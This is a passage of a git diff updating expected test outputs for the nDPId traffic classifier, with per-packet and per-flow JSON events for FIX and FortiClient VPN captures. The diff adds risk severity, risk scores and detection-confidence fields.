+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","total-events-serialized":74}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1261/1261
@@ -80,10 +80,10 @@
 ~~ total active/idle flows...: 12/12
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4669174 bytes
-~~ total memory freed........: 4669174 bytes
-~~ total allocations/frees...: 100859/100859
+~~ total memory allocated....: 4750519 bytes
+~~ total memory freed........: 4750519 bytes
+~~ total allocations/frees...: 102449/102449
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 643 chars
-~~ json string avg len.......: 470 chars
+~~ json string max len.......: 669 chars
+~~ json string avg len.......: 483 chars
diff --git a/test/results/forticlient.pcap.out b/test/results/forticlient.pcap.out
index 3355c7568..6cd3837ac 100644
--- a/test/results/forticlient.pcap.out
+++ b/test/results/forticlient.pcap.out
@@ -3,42 +3,42 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01122{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01409{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 